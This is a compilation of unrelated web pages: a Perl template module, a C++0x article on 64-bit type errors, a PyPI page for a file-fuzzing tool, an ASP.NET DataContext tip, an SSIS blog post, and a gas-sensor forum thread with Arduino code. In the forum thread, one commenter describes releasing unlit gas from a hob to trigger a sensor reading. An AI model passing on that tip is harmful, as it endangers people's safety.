    # Next we add the object that will be accepting the HTML strings.
    if ($template) {
        $retVal->{varHash} = {};
    } else {
        $retVal->{html} = [];
    }
    # Return the result.
    bless $retVal, $class;
    return $retVal;
}

=head3 mode

C<< my $flag = $to->mode(); >>

Return TRUE if a template is active, else FALSE.

=cut

sub mode {
    # Get the parameters.
    my ($self) = @_;
    # Return the result.
    return ($self->{template} ? 1 : 0);
}

=head3 raw

C<< my $flag = $to->raw(); >>

Return TRUE if we're accumulating raw HTML, else FALSE.

=cut

sub raw {
    # Get the parameters.
    my ($self) = @_;
    # Return the result.
    return ($self->{template} ? 0 : 1);
}

=head3 add

C<< $to->add($name => $html); >>

or

C<< $to->add($html); >>

Add HTML to the template data using the specified name. If a template is in effect, the data will be put into a variable hash. If raw HTML is being accumulated, the data will be added to the end of the HTML list. In the second form (without the name), the text is discarded in template mode and added to the HTML in raw mode.

=over 4

=item name (optional)

Name of the variable to be replaced by the specified HTML. If omitted, the HTML is discarded if we are in template mode.

=item html

HTML string to be put into the output stream. Note that if it is guaranteed that a template is to be used, references to lists of text or hashes may also be passed in, depending on the features used by the template.

=back

=cut

sub add {
    # Get the parameters.
    my ($self, $name, $html) = @_;
    # Adjust the parameters if no name was specified.
    if (! defined($html)) {
        $html = $name;
        $name = "";
    }
    # Check the mode.
    if ($self->mode) {
        # Here we're using a template.
        # We only proceed if a name was specified.
        if ($name) {
            $self->{varHash}->{$name} = $html;
        }
    } else {
        # No template: we're just accumulating the HTML in a list.
        push @{$self->{html}}, $html;
    }
}

=head3 append

C<< $to->append($name, $html); >>

Append HTML to a named variable. Unlike L</add>, this method will not destroy a variable's existing value; instead, it will concatenate the new data at the end of the old.

=over 4

=item name

Name of the variable to which the HTML text is to be appended.

=item html

HTML text to append.

=back

=cut

sub append {
    # Get the parameters.
    my ($self, $name, $html) = @_;
    # Check the mode.
    if ($self->mode) {
        # Template mode, so we check for the variable.
        my $hash = $self->{varHash};
        if (exists $hash->{$name}) {
            $hash->{$name} .= $html;
        } else {
            $hash->{$name} = $html;
        }
    } else {
        # Raw mode.
        push @{$self->{html}}, $html;
    }
}

=head3 titles

C<< $to->titles($parameters); >>

If no template is in use, generate the plain SEED header. If a template is in use, get the version, peg ID, and message of the day for use in the template. This subroutine provides a uniform method for starting a web page regardless of mode.

=over 4

=item parameters

Reference to a hash containing the heading parameters. These are as follows.

=over 8

=item fig_object

Fig-like object used to access the data store.

=item peg_id

ID of the current protein.

=item table_style

Style to use for tables.

=item fig_disk

Directory of the FIG disk.

=item form_target

Target script for most forms.

=back

=back

=cut

sub titles {
    # Get the parameters.
    my ($self, $parameters) = @_;
    my $cgi = $self->{cgi};
    if ($self->{template}) {
        # In template mode, we get useful stuff from the framework. First, the message
        # of the day.
        $self->add(motd => FigWebServices::SeedComponents::Framework::get_motd($parameters));
        # Now the version.
        $self->add(version => FigWebServices::SeedComponents::Framework::get_version({fig => $parameters->{fig_object}, fig_disk => $parameters->{fig_disk}}));
        # Next, the location tag.
        $self->add(location_tag => $self->{cgi}->url());
        # Finally the protein (if any).
        if (exists $parameters->{peg_id}) {
            $self->add(feature_id => $parameters->{peg_id});
        }
    } else {
        # No template, so we pull in the plain header.
        $self->add($cgi->start_html(-title => $parameters->{title}));
        $self->add(header => FigWebServices::SeedComponents::Framework::get_plain_header($parameters));
    }
}

=head3 finish

C<< my $webPage = $to->finish(); >>

Format the template information into a web page. The HTML passed in by the L</add> methods is assembled into the proper form and returned to the caller.

=cut

sub finish {
    # Get the parameters.
    my ($self) = @_;
    # Declare the return variable.
    my $retVal;
    # Check the mode.
    if ($self->{template}) {
        # Here we have to process a template.
        $retVal = PageBuilder::Build($self->{template}, $self->{varHash}, "Html");
    } else {
        # Here we need to assemble raw HTML in sequence. First, we check for the
        # closing HTML tags. If the last line is a body close, we only need to add
        # the html close. If it's not a body close or an html close, we need to
        # add both tags.
        my @html = @{$self->{html}};
        if ($html[$#html] =~ m!/body!i) {
            push @html, "</html>";
        } elsif ($html[$#html] !~ m!/html!i) {
            push @html, "</body></html>";
        }
        # Join the lines together to make a page.
        $retVal = join("\n", @html);
    }
    # Return the result.
    return $retVal;
}

1;
http://biocvs.mcs.anl.gov/viewcvs.cgi/FigKernelPackages/TemplateObject.pm?revision=1.6&view=markup&pathrev=mgrast_rel_2008_0917
Programmers see in the C++0x standard an opportunity to use lambda functions and other entities I do not quite understand :). But personally I see in it convenient means that allow us to get rid of many 64-bit errors. Consider a function that returns "true" if at least one string contains the sequence "ABC".

typedef vector<string> ArrayOfStrings;

bool Find_Incorrect(const ArrayOfStrings &arrStr)
{
  ArrayOfStrings::const_iterator it;
  for (it = arrStr.begin(); it != arrStr.end(); ++it)
  {
    unsigned n = it->find("ABC");
    if (n != string::npos)
      return true;
  }
  return false;
};

This function is correct when compiling the Win32 version but fails when building the application in Win64 mode. Consider another example of using the function:

#ifdef IS_64
  const char WinXX[] = "Win64";
#else
  const char WinXX[] = "Win32";
#endif

int _tmain(int argc, _TCHAR* argv[])
{
  ArrayOfStrings array;
  array.push_back(string("123456"));
  array.push_back(string("QWERTY"));
  if (Find_Incorrect(array))
    printf("Find_Incorrect (%s): ERROR!\n", WinXX);
  else
    printf("Find_Incorrect (%s): OK!\n", WinXX);
  return 0;
}

Find_Incorrect (Win32): OK!
Find_Incorrect (Win64): ERROR!

The error here is related to choosing the type "unsigned" for the "n" variable although the function find() returns a value of the string::size_type type. In the 32-bit program, the types string::size_type and unsigned coincide and we get the correct result. In the 64-bit program, these types do not coincide. As the substring is not found, the function find() returns the value string::npos that equals 0xFFFFFFFFFFFFFFFFui64. This value gets cut to 0xFFFFFFFFu and is written into the 32-bit variable. As a result, the condition 0xFFFFFFFFu == 0xFFFFFFFFFFFFFFFFui64 is always false and we get the message "Find_Incorrect (Win64): ERROR!". We may correct the code using the type string::size_type.
bool Find_Correct(const ArrayOfStrings &arrStr)
{
  ArrayOfStrings::const_iterator it;
  for (it = arrStr.begin(); it != arrStr.end(); ++it)
  {
    string::size_type n = it->find("ABC");
    if (n != string::npos)
      return true;
  }
  return false;
};

Now the code works as it should, though it is too long and not very nice to constantly write out the type string::size_type. You may redefine it through typedef but it still looks somewhat complicated. Using C++0x we can make the code much smarter and safer. Let us use the keyword "auto" to do that. Earlier, this word meant that the variable was created on the stack, and it was implied if you had not specified something different, for example, register. Now the compiler identifies the type of a variable defined as "auto" on its own, relying on the expression that initializes this variable. Note that an auto-variable cannot store values of different types during one instance of program execution. C++ remains a statically typed language and "auto" only makes the compiler identify the type on its own: once the variable is initialized, its type cannot be changed.

Let us use the keyword "auto" in our code. The project was created in Visual Studio 2005, while the C++0x standard is supported only beginning with Visual Studio 2010. So I chose the Intel C++ compiler, included in Intel Parallel Studio 11.1 and supporting the C++0x standard, to perform compilation. The option enabling C++0x support is located in the Language section and reads "Enable C++0x Support". As you may see in Figure 1, this option is Intel Specific.

Figure 1 - Support of C++0x standard

The modified code looks as follows:

bool Find_Cpp0X(const ArrayOfStrings &arrStr)
{
  for (auto it = arrStr.begin(); it != arrStr.end(); ++it)
  {
    auto n = it->find("ABC");
    if (n != string::npos)
      return true;
  }
  return false;
};

Consider the way the variable "n" is defined now. Smart, isn't it? It also eliminates some errors, including 64-bit ones.
The variable "n" will now have exactly the same type as the one returned by the function find(), i.e. string::size_type. Note also that there is no longer a separate line with the iterator definition:

ArrayOfStrings::const_iterator it;

It was not very nice to define the variable "it" in a separate statement (its type name is rather lengthy), so the definition was moved into the loop header. Now the code is short and accurate:

for (auto it = arrStr.begin(); ......)

Let us examine one more keyword, "decltype". It allows you to define the type of a variable relying on the type of another expression. If we had to define all the variables in our code beforehand, we could write it in this way:

bool Find_Cpp0X_2(const ArrayOfStrings &arrStr)
{
  decltype(arrStr.begin()) it;
  decltype(it->find("")) n;
  for (it = arrStr.begin(); it != arrStr.end(); ++it)
  {
    n = it->find("ABC");
    if (n != string::npos)
      return true;
  }
  return false;
};

Of course, it is senseless in our case but may be useful in some others. Unfortunately (or fortunately for us :-), the new standard does not eliminate already existing defects in the code despite really simplifying the process of writing safe 64-bit code. To be able to fix an error with the help of a memsize-type or "auto" you must first find this error. So, the Viva64 tool will not become less relevant with the appearance of the C++0x standard.

P.S. You may download the project with the code here.
http://www.viva64.com/en/b/0060/
Tools for stress testing applications.

Project description

Stress testing of applications can be done in lots of different ways. This package provides an easy to use tool to stress test applications which take files as parameters. Editors, image viewers, compilers, and many more classes of apps come to mind. The stress test is based on a given set of files, binary or text. Those files are taken randomly and some bytes are modified also randomly (fuzzing). Then the application gets executed with the fuzzed file. Repeating this over and over again stresses the robustness of the application against defective input data.

Tutorial and API documentation can be found on ReadTheDocs.

What's new?

Now you can run your tests in multiple processes. Test results are combined and printed.

Installation

The easiest way to install is via easy_install or pip

$ pip install fuzzing

There are feature-related tests that can be run with behave, and unit tests runnable with pytest or nosetests.

Example

from fuzzing.fuzzer import FuzzExecutor

# Files to use as initial input seed.
file_list = ["./features/data/t1.pdf", "./features/data/t3.pdf", "./features/data/t2.jpg"]

# List of applications to test.
apps_under_test = ["/Applications/Adobe Reader 9/Adobe Reader.app/Contents/MacOS/AdobeReader",
                   "/Applications/PDFpen 6.app/Contents/MacOS/PDFpen 6",
                   "/Applications/Preview.app/Contents/MacOS/Preview",
                   ]

number_of_runs = 13

def test():
    fuzz_executor = FuzzExecutor(apps_under_test, file_list)
    fuzz_executor.run_test(number_of_runs)
    return fuzz_executor.stats

def main():
    stats = test()
    print(stats)

Using pre-built test runner and configuration

For convenience a test runner is provided which takes a test configuration.
Example of a configuration YAML file:

version: 1
seed_files: ['requirements.txt', 'README.rst']
applications: ['MyFunnyApp', 'AdobeReader']
runs: 800
processors: 4
processes: 10

Then call the test runner in a terminal session:

$ run_fuzzer.py test.yaml

This will execute the tests as configured and print the test result when done:

$ run_fuzzer.py test.yaml
Starting up ...
... finished

Test Results:

MyFunnyApp
    succeeded: 4021
    failed: 95
AdobeReader
    succeeded: 3883
    failed: 1

License: MIT
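The byte-level fuzzing the package applies to its seed files can be sketched in a few lines of plain Python. This is an illustration of the idea only, not the package's actual implementation (the `fuzz_bytes` helper below is hypothetical):

```python
import random

def fuzz_bytes(data, count=10, seed=None):
    """Return a copy of data with `count` randomly chosen bytes replaced."""
    rng = random.Random(seed)          # optional seed for reproducible fuzzing
    buf = bytearray(data)
    for _ in range(count):
        pos = rng.randrange(len(buf))  # pick a random position...
        buf[pos] = rng.randrange(256)  # ...and overwrite it with a random byte
    return bytes(buf)

# A stress test then feeds fuzzed copies of the seed files to the
# application under test, run after run, watching for crashes.
```

Writing `fuzz_bytes(open("t1.pdf", "rb").read())` to a temporary file and launching the application on it, in a loop, is essentially what a run of the executor does.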
https://pypi.org/project/fuzzing/
In most of the code samples that I write, I create an instance of a DataContext object, but I never properly dispose of it. Is this wrong?

The DataContext class implements the IDisposable interface. In general, if a class implements the IDisposable interface, then that is good evidence that you should call Dispose(). But keep reading.

Classes that implement the IDisposable interface typically use resources that cannot be cleaned up by the .NET framework garbage collector. Calling the IDisposable.Dispose() method executes code that explicitly releases a precious resource back into the world. A prime example of a class that implements the IDisposable interface is the SqlConnection class. A SqlConnection class uses a Microsoft SQL Server database connection. Because SQL Server supports a limited number of connections, it is important to release a connection as quickly as possible.

Typically, you do not call the Dispose() method directly. Typically, you take advantage of a Using statement in your code like this:

C# Code

using (var con = new SqlConnection(conString))
{
    con.Open();
    var cmd = new SqlCommand("SELECT * FROM Products", con);
    var reader = cmd.ExecuteReader();
}

VB.NET Code

Using con = New SqlConnection(conString)
    con.Open()
    Dim cmd = New SqlCommand("SELECT * FROM Products", con)
    Dim reader = cmd.ExecuteReader()
End Using

A Using statement calls the Dispose() method at the end of the Using block automatically. The Using statement calls the Dispose() method even if there was an error in the code.

Dispose of the DataContext

Because the DataContext implements IDisposable, it would seem like the right way to use the DataContext in a controller is like Listing 1. In Listing 1, a DataContext is used within a Using statement.
Listing 1 – BadController.cs

using System.Linq;
using System.Web.Mvc;
using MvcFakes;
using Tip34.Models;

namespace Tip34.Controllers
{
    public class BadController : Controller
    {
        private IDataContext _dataContext;

        public BadController()
            : this(new DataContextWrapper("dbcon", "~/Models/Movie.xml")) { }

        public BadController(IDataContext dataContext)
        {
            _dataContext = dataContext;
        }

        public ActionResult Index()
        {
            using (_dataContext)
            {
                var table = _dataContext.GetTable<Movie>();
                var movies = from m in table select m;
                return View("Index", movies);
            }
        }
    }
}

The controller in Listing 1 is taking advantage of the IDataContext, DataContextWrapper, and FakeDataContext objects discussed in the previous tip. By taking advantage of these objects, you can easily test your MVC application. Within the Index() method, the DataContext is used within a Using statement. The Using statement causes the Dispose() method to be called on the DataContext object (the DataContextWrapper.Dispose() method delegates to the DataContext.Dispose() method).

You can use the controller in Listing 1 with a typed view. The typed view casts the ViewData.Model property to an instance of IQueryable. The code-behind for the typed view is contained in Listing 2.

Listing 2 -- \Views\Bad\Index.aspx.cs

using System.Linq;
using System.Web.Mvc;
using Tip34.Models;

namespace Tip34.Views.Bad
{
    public partial class Index : ViewPage<IQueryable<Movie>>
    {
    }
}

Unfortunately, however, the code in Listing 1 does not work. If you try to execute this code, you get the error displayed in Figure 1. You receive the error: "Cannot access a disposed object". The problem is that the DataContext has already been disposed before the DataContext can be used in the view.

Figure 1 – Error from early disposal

One of the big benefits of using LINQ to SQL is that it supports deferred execution. A LINQ to SQL statement is not actually executed against the database until you start iterating through the results.
Because the movie records are not accessed until they are displayed in the Index view, the DataContext is disposed before the records are retrieved from the database and you get the error. One easy way to fix the problem with the controller in Listing 1 is to pass the movies as a list instead of as an IQueryable. The modified Index() action method in Listing 3 does not cause an error:

Listing 3 – HomeController.cs

using System.Linq;
using System.Web.Mvc;
using MvcFakes;
using Tip34.Models;

namespace Tip34.Controllers
{
    public class HomeController : Controller
    {
        private IDataContext _dataContext;

        public HomeController()
            : this(new DataContextWrapper("dbcon", "~/Models/Movie.xml")) { }

        public HomeController(IDataContext dataContext)
        {
            _dataContext = dataContext;
        }

        public ActionResult Index()
        {
            using (_dataContext)
            {
                var table = _dataContext.GetTable<Movie>();
                var movies = from m in table select m;
                return View("Index", movies.ToList());
            }
        }

        public ActionResult Details(int id)
        {
            using (_dataContext)
            {
                var table = _dataContext.GetTable<Movie>();
                var movie = table.SingleOrDefault(m => m.Id == id);
                return View("Details", movie);
            }
        }
    }
}

The only difference between the Index() method in Listing 3 and the Index() method in Listing 1 is that the ToList() method is called on the movies before the movies are passed to the view. The controller in Listing 3 also contains a Details() action that displays details for a particular movie. You do not need to do anything special when retrieving a single database record. LINQ to SQL does not use deferred execution when you retrieve a single record.
If you change the typed view so that it expects a list instead of an IQueryable, then everything works fine:

    using System.Collections.Generic;
    using System.Web.Mvc;
    using Tip34.Models;

    namespace Tip34.Views.Home
    {
        public partial class Index : ViewPage<List<Movie>>
        {
        }
    }

The modified controller now works because the ToList() method forces the LINQ to SQL statement to be executed against the database within the controller and not within the view.

You can unit test the Home controller in Listing 3 just fine. The class in Listing 4 contains a unit test that verifies that the Index() method returns a set of database records.

Listing 4 -- \Controllers\HomeControllerTest.cs

    using System.Collections.Generic;
    using System.Web.Mvc;
    using Microsoft.VisualStudio.TestTools.UnitTesting;
    using MvcFakes;
    using Tip34.Controllers;
    using Tip34.Models;

    namespace Tip34Tests.Controllers
    {
        [TestClass]
        public class HomeControllerTest
        {
            [TestMethod]
            public void Index()
            {
                // Create Fake DataContext
                var context = new FakeDataContext();
                var table = context.GetTable<Movie>();
                table.InsertOnSubmit(new Movie(1, "Star Wars"));
                table.InsertOnSubmit(new Movie(2, "King Kong"));
                context.SubmitChanges();

                // Create Controller
                var controller = new HomeController(context);

                // Act
                ViewResult result = controller.Index() as ViewResult;

                // Assert
                var movies = (List<Movie>)result.ViewData.Model;
                Assert.AreEqual("Star Wars", movies[0].Title);
            }
        }
    }

This unit test takes advantage of the FakeDataContext class described in the previous tip to create an in-memory version of a DataContext. First, the unit test adds some fake database records to the FakeDataContext. Next, the Index() action is invoked and a result is returned. Finally, the ViewData contained in the result is compared against the fake database records. If the ViewData contains the first fake database record, then the Index() action works correctly.
Don’t Dispose of the DataContext In the previous section, I demonstrated how you can Dispose() of a DataContext within an MVC controller action. In this section, I question the necessity of doing this. When you call the DataContext Dispose() method, the DataContext delegates the call to the SqlProvider class. The SqlProvider class does two things. First, the SqlProvider calls the ConnectionManager.DisposeConnection() method which closes any open database connection associated with the DataContext. Second, the SqlProvider sets several objects to null (including the ConnectionManager). So, the most important consequence of calling the DataContext.Dispose() method is that any open connections associated with the DataContext get closed. This might seem really important, but it’s not. The reason that it is not important is that the DataContext class already manages its connections. By default, the DataContext class opens and closes a connection automatically. The DataContext object translates a LINQ to SQL query into a standard SQL database query and executes it. The DataContext object opens a database connection right before executing the SQL database query and closes the connection right after the query is executed (the connection is closed in the Finally clause of a Try..Catch block). If you prefer, you can manage the opening and closing of the database connection used by a DataContext yourself. You can use the DataContext.Connection property to explicitly open a connection and explicitly close the connection. Normally, however, you don’t do this. You let the DataContext take care of itself. Most often, when you call the Dispose() method on the DataContext object, any database connection associated with the DataContext object is already closed. The DataContext object has closed the database connection right after executing the database query. So, the Dispose() method really doesn't have anything to do. 
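The open-right-before, close-right-after behavior described above can be sketched in Python (a simplified model of the idea, not the real LINQ to SQL internals; every name here is invented):

```python
class Connection:
    def __init__(self):
        self.open = False
    def connect(self):
        self.open = True
    def close(self):
        self.open = False

class AutoManagedContext:
    """Opens a connection just before each query and closes it right after,
    mirroring how the DataContext manages its own connection."""
    def __init__(self):
        self.connection = Connection()

    def execute(self, sql):
        self.connection.connect()
        try:
            return f"rows for: {sql}"   # pretend to hit the database here
        finally:
            # closed in the 'finally', as the article describes
            self.connection.close()

ctx = AutoManagedContext()
result = ctx.execute("SELECT * FROM Movies")
print(result)
print(ctx.connection.open)  # False: nothing left for a Dispose() to close
```

By the time a hypothetical dispose step ran on this object, the connection would already be closed, which is exactly the point the article makes about DataContext.Dispose().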
Therefore, you really don’t get any huge benefits from calling Dispose() on the DataContext object. The only slight benefit is that the Dispose() method sets several objects to null so that they can be collected earlier by the garbage collector. Unless you are worried about every byte used by your application, or you are tracking a huge number of objects with your DataContext, I wouldn’t worry too much about the memory overhead of the DataContext object.

Summary

In this tip, I demonstrated how you can call the Dispose() method when working with a DataContext object within an MVC controller. Next, I argued that there really isn’t a very compelling reason to want to call the Dispose() method. I plan to continue to be lazy about disposing any DataContext objects that I use within my MVC controllers.
http://weblogs.asp.net/stephenwalther/asp-net-mvc-tip-34-dispose-of-your-datacontext-or-don-t
Renaming the Script Project in SSIS 2008 I found something interesting in SSIS 2008 today, and thought I’d share it. I was working with David Darden on a package that included a script task. In 2008, the Visual Studio Tools for Applications (VSTA) environment is used to edit script tasks. It exposes a few more details about the script task, including the project name. By default, it creates a rather long project name, as you can see in the screen shot below. (Yes, that is C#. It’s my preferred language, so expect to see more of it here now that it’s available in 2008). The namespace is based on the project name, so you get the same long value for it. While poking around in the script task’s expressions editor, we found the ScriptProjectName property. This property does not show up in the Properties window (F4), only in the expressions editor. By setting this, you can update the project name in the script. For example, setting this property to "NewScriptProjectName", as shown here: results in this showing up in the script project: There are a few caveats to this. One, if you do this after initially editing the script, the project name will be updated, but the namespace will remain the same. Two, you must save the package after setting the expression, in order for the expression to be applied. If you add the expression, then edit the script without saving, it will not use the new project name. So, if you want to name your script project with a friendly name, do the following: - Add the Script Task. - Add an expression to set the ScriptProjectName property to your desired value. - Save the package. - Now you can use the Edit Script button to edit the script project with the friendly name. I do want to point out that the name of the project has no real impact on functionality. The script will not run any differently if you do this. It’s purely for aesthetic purposes. But if the long, random looking project names bother you, it’s nice to know you can fix them. 
There is also a MSDN forum post here that details the steps to edit the namespace after the script has been edited for the first time. It’s a little easier to set it this way, though, so that it is handled up front.
http://agilebi.com/jwelch/2008/04/
💬 Gas Sensor

This thread contains comments for the article "Gas Sensor" posted on MySensors.org.

Just a note for any Domoticz users who may try this sketch - it presents in the log, but is not available under 'Devices' to be added UNTIL it gets a reading > 0. My solution to that was to go put the node over the gas hob and let the gas run (unlit) for a few seconds so that it generated a reading. Remember kids, gas is dangerous, stay safe.

Where can I get a cheap MQ-138 sensor please?

Have you looked at aliexpress?

Hi Gohan, yes I did, it seems that they are very expensive wherever I look. I'll wait on this one for now. Thanks for the suggestion though.

I believe it is on the cheap side. These price ranges are mainly for hobbyist sensors. The real calibrated ones are usually way more expensive. The cheap ones are only good to measure trends, not for the actual value.

Please advise what the curve would be for the MQ135 sensor for CO2. Thank you.

Sure, the curve is there.

I am trying to make sense of the two-point curve that is used in the sketch for the MQ2 sensor, CO gas: "point1: (lg200, 0.72), point2: (lg10000, 0.15)", while I see on the curve from the datasheet (lg200, 5.2) and (lg10000, 1.3). That is why I am asking for help, sorry for not making it clear.

Lack of support makes you think, so I figured out the "hidden" calculations in the sketch above and am proposing a code modification to allow users to port the code to a different gas sensor using data taken directly from the sensor chart.
Here are modified fragments of the code showing only the CO curve for the MQ2 sensor:

    float CO2Curve[4] = {0.8, 200, 2.2, 10};
    // two end points are taken from the curve, with two coordinates for each
    // point, in the form {Y1, X1, Y2, X2} where X is the PPM axis and Y is the
    // Rs/Ro axis of the sensor chart for the specific gas.
    // The equation X = (Y - b) / m is then used (in log-log space),
    // where m is the slope of the curve and b is the Y-axis intercept point.

    int MQGetPercentage(float rs_ro_ratio, float *pcurve)
    {
        // base-10 logs must be used here, because the result is raised
        // back with pow(10, ...)
        float slope = (log10(pcurve[2]) - log10(pcurve[0])) /
                      (log10(pcurve[3]) - log10(pcurve[1]));
        float y_intercept = log10(pcurve[0]) - slope * log10(pcurve[1]);
        return (pow(10, ((log10(rs_ro_ratio) - y_intercept) / slope)));
    }

I have found this sketch for MQ7 sensors:

    /*
    This code was developed by the_3d6 from Ultimate Robotics ().
    License: you can use it for any purpose as long as you don't claim that you
    are its author and you don't alter License terms and formulations (lines
    1-10 of this file). You can share modifications of the code if you have
    properly tested their functionality, including confirming correct sensor
    response on CO concentrations of 0-30ppm, 100-300ppm and 1000-10000ppm.
    If you can improve this code, please do so!
    You can contact me at aka.3d6@gmail.com
    */

    //WARNING! Each sensor is different!
    //You MUST calibrate sensor manually and
    //set proper sensor_reading_clean_air value before using
    //it for any practical purpose!
    int time_scale = 8;
    //time scale: we altered main system timer, so now all functions like
    //millis(), delay() etc will think that time moves 8 times faster than it
    //really is. To correct that, we use time_scale variable: in order to make
    //delay for 1 second, now we call delay(1000*time_scale)

    void setTimer0PWM(byte chA, byte chB) //pins D5 and D6
    {
      TCCR0A = 0b10110011; //OCA normal, OCB inverted, fast pwm
      TCCR0B = 0b010;      //8 prescaler - instead of system's default 64 prescaler - thus time moves 8 times faster
      OCR0A = chA;         //0..255
      OCR0B = chB;
    }

    void setTimer2PWM(byte chA, byte chB) //pins D11 and D3
    {
      TCCR2A = 0b10100011; //OCA, OCB, fast pwm
      TCCR2B = 0b001;      //no prescaler
      OCR2A = chA;         //0..255
      OCR2B = chB;
    }

    void setTimer1PWM(int chA, int chB) //pins D9 and D10
    {
      TCCR1A = 0b10100011; //OCA, OCB, fast pwm
      TCCR1B = 0b1001;     //no prescaler
      OCR1A = chA;         //0..1023
      OCR1B = chB;
    }

    float opt_voltage = 0;
    byte opt_width = 240; //default reasonable value

    //this function tries various PWM cycle widths and prints resulting
    //voltage for each attempt, then selects best fitting one and
    //this value is used in the program later
    void pwm_adjust()
    {
      float previous_v = 5.0;     //voltage at previous attempt
      float raw2v = 5.0 / 1024.0; //coefficient to convert Arduino's
                                  //analogRead result into voltage in volts
      for (int w = 0; w < 250; w++)
      {
        setTimer2PWM(0, w);
        float avg_v = 0;
        for (int x = 0; x < 100; x++) //measure over about 100ms to ensure stable result
        {
          avg_v += analogRead(A1);
          delay(time_scale);
        }
        avg_v *= 0.01;
        avg_v *= raw2v;
        Serial.print("adjusting PWM w=");
        Serial.print(w);
        Serial.print(", V=");
        Serial.println(avg_v);
        if (avg_v < 3.6 && previous_v > 3.6) //we found optimal width
        {
          float dnew = 3.6 - avg_v;       //now we need to find if current one
          float dprev = previous_v - 3.6; //or previous one is better
          if (dnew < dprev) //if new one is closer to 1.4 then return it
          {
            opt_voltage = avg_v;
            opt_width = w;
            return;
          }
          else //else return previous one
          {
            opt_voltage = previous_v;
            opt_width = w - 1;
            return;
          }
        }
        previous_v = avg_v;
      }
    }

    float alarm_ppm_threshold = 100; //threshold CO concentration for buzzer alarm to be turned on
    float red_threshold = 40;        //threshold when green LED is turned off and red turns on
    float reference_resistor_kOhm = 10.0; //fill correct resistor value if you are using not 10k reference
    float sensor_reading_clean_air = 600; //fill raw sensor value at the end of measurement phase (before heating starts) in clean air here! That is critical for proper calculation
    float sensor_reading_100_ppm_CO = -1; //if you can measure it using some CO meter
                                          //or precisely calculated CO sample, then fill it here;
                                          //otherwise leave -1, default values will be used in this case
    float sensor_100ppm_CO_resistance_kOhm; //calculated from sensor_reading_100_ppm_CO variable
    float sensor_base_resistance_kOhm;      //calculated from sensor_reading_clean_air variable

    byte phase = 0;             //1 - high voltage, 0 - low voltage, we start from measuring
    unsigned long prev_ms = 0;  //milliseconds in previous cycle
    unsigned long sec10 = 0;    //this timer is updated 10 times per second;
    //when it will overflow, program might freeze or behave incorrectly.
    //It will happen only after ~13 years of operation. Still,
    //if you'll ever use this code in industrial application,
    //please take care of overflow problem
    unsigned long high_on = 0;    //time when we started high temperature cycle
    unsigned long low_on = 0;     //time when we started low temperature cycle
    unsigned long last_print = 0; //time when we last printed message in serial
    float sens_val = 0;           //current smoothed sensor value
    float last_CO_ppm_measurement = 0; //CO concentration at the end of previous measurement cycle

    float raw_value_to_CO_ppm(float value)
    {
      if (value < 1) return -1; //wrong input value
      sensor_base_resistance_kOhm = reference_resistor_kOhm * 1023 / sensor_reading_clean_air - reference_resistor_kOhm;
      if (sensor_reading_100_ppm_CO > 0)
      {
        sensor_100ppm_CO_resistance_kOhm = reference_resistor_kOhm * 1023 / sensor_reading_100_ppm_CO - reference_resistor_kOhm;
      }
      else
      {
        sensor_100ppm_CO_resistance_kOhm = sensor_base_resistance_kOhm * 0.5;
        //This seems to contradict manufacturer's datasheet, but for my sensor it
        //looks quite real using CO concentration produced by CH4 flame according to
        //this paper:
        //my experiments were very rough though, so I could have overestimated CO concentration significantly.
        //If you have calibrated sensor to produce reference 100 ppm CO, then
        //use it instead
      }
      float sensor_R_kOhm = reference_resistor_kOhm * 1023 / value - reference_resistor_kOhm;
      float R_relation = sensor_100ppm_CO_resistance_kOhm / sensor_R_kOhm;
      float CO_ppm = 100 * (exp(R_relation) - 1.648);
      if (CO_ppm < 0) CO_ppm = 0;
      return CO_ppm;
    }

    void startMeasurementPhase()
    {
      phase = 0;
      low_on = sec10;
      setTimer2PWM(0, opt_width);
    }

    void startHeatingPhase()
    {
      phase = 1;
      high_on = sec10;
      setTimer2PWM(0, 255);
    }

    void setLEDs(int br_green, int br_red)
    {
      if (br_red < 0) br_red = 0;
      if (br_red > 100) br_red = 100;
      if (br_green < 0) br_green = 0;
      if (br_green > 100) br_green = 100;
      float br = br_red;
      br *= 0.01;
      br = (exp(br) - 1) / 1.7183 * 1023.0;
      float bg = br_green;
      bg *= 0.01;
      bg = (exp(bg) - 1) / 1.7183 * 1023.0;
      if (br < 0) br = 0;
      if (br > 1023) br = 1023;
      if (bg < 0) bg = 0;
      if (bg > 1023) bg = 1023;
      setTimer1PWM(1023 - br, 1023 - bg);
    }

    void buzz_on()
    {
      setTimer0PWM(128, 128);
    }

    void buzz_off()
    {
      setTimer0PWM(255, 255);
    }

    void buzz_beep()
    {
      byte sp = sec10 % 15;
      if (sp == 0) buzz_on();
      if (sp == 1) buzz_off();
      if (sp == 2) buzz_on();
      if (sp == 3) buzz_off();
      if (sp == 4) buzz_on();
      if (sp == 5) buzz_off();
    }

    void setup()
    {
      //WARNING! Each sensor is different!
      //You MUST calibrate sensor manually and
      //set proper sensor_reading_clean_air value before using
      //it for any practical purpose!
      pinMode(5, OUTPUT);
      pinMode(6, OUTPUT);
      pinMode(3, OUTPUT);
      pinMode(9, OUTPUT);
      pinMode(10, OUTPUT);
      pinMode(A0, INPUT);
      pinMode(A1, INPUT);
      setTimer1PWM(1023, 0);
      analogReference(DEFAULT);
      Serial.begin(115200);
      pwm_adjust();
      Serial.print("PWM result: width ");
      Serial.print(opt_width);
      Serial.print(", voltage ");
      Serial.println(opt_voltage);
      Serial.println("Data output: raw A0 value, heating on/off (0.1 off 1000.1 on), CO ppm from last measurement cycle");
      //beep buzzer in the beginning to indicate that it works
      buzz_on();
      delay(100 * time_scale);
      buzz_off();
      delay(100 * time_scale);
      buzz_on();
      delay(100 * time_scale);
      buzz_off();
      delay(100 * time_scale);
      buzz_on();
      delay(100 * time_scale);
      buzz_off();
      delay(100 * time_scale);
      startMeasurementPhase(); //start from measurement
    }

    void loop()
    {
      //WARNING! Each sensor is different!
      //You MUST calibrate sensor manually and
      //set proper sensor_reading_clean_air value before using
      //it for any practical purpose!
      unsigned long ms = millis();
      int dt = ms - prev_ms;
      //this condition runs 10 times per second, even if millis()
      //overflows - which is required for long-term stability.
      //When millis() overflows, this condition will run after less
      //than 0.1 seconds - but that's fine, since it happens only once
      //per several days
      if (dt > 100 * time_scale || dt < 0)
      {
        prev_ms = ms; //store previous cycle time
        sec10++;      //increase 0.1s counter
        if (sec10 % 10 == 1) //we want LEDs to blink periodically
        {
          setTimer1PWM(1023, 1023); //blink LEDs once per second
          //use %100 to blink once per 10 seconds, %2 to blink 5 times per second
        }
        else //all other time we calculate LEDs and buzzer state
        {
          int br_red = 0, br_green = 0; //brightness from 1 to 100, setLEDs function handles converting it into timer settings
          if (last_CO_ppm_measurement <= red_threshold) //turn green LED if we are below 30 PPM
